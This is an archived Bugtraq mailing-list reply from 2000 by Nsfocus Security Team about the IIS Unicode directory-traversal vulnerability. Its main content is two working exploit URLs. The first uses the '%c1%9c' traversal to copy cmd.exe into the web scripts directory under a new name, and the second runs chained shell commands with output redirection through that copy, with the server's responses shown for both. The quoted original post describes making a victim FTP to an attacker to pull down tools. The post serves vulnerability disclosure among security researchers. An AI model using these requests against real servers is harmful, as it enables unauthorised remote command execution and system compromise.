[17352] in bugtraq
Re: IIS Unicode
daemon@ATHENA.MIT.EDU (Nsfocus Security Team)
Wed Oct 25 15:38:33 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Message-ID: <200010250817.QAA14475@intra.nsfocus.com>
Date: Wed, 25 Oct 2000 16:12:13 +0800
Reply-To: Nsfocus Security Team <security@NSFOCUS.COM>
From: Nsfocus Security Team <security@NSFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
If we copy and rename "cmd.exe" to another filename , the limit can be bypassed.
(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
IIS returned :
"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
1 file(s) copied."
(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
IIS returned :
" Directory of c:\inetpub\scripts
10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"
---Original Message---
>Bugtraq ID 1806,
>http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:
>
>I was having problems executing a command that contains a redirect (>) using
>any of the IIS Unicode exploits (including my own exploits on security focus
>;) ). If anyone can get a redirect working, please let me know. In order to get
>some interesting tools on the victim, you would probably want to have the
>victim to FTP to the attacker. Problem without redirect is that you cannot
>build the FTP command file, and you are a bit stuck.
>
[snip]
>------------------------------------------------------
>Roelof W Temmingh SensePost IT security
Regards,
Nsfocus Security Team <security@nsfocus.com>
http://www.nsfocus.com
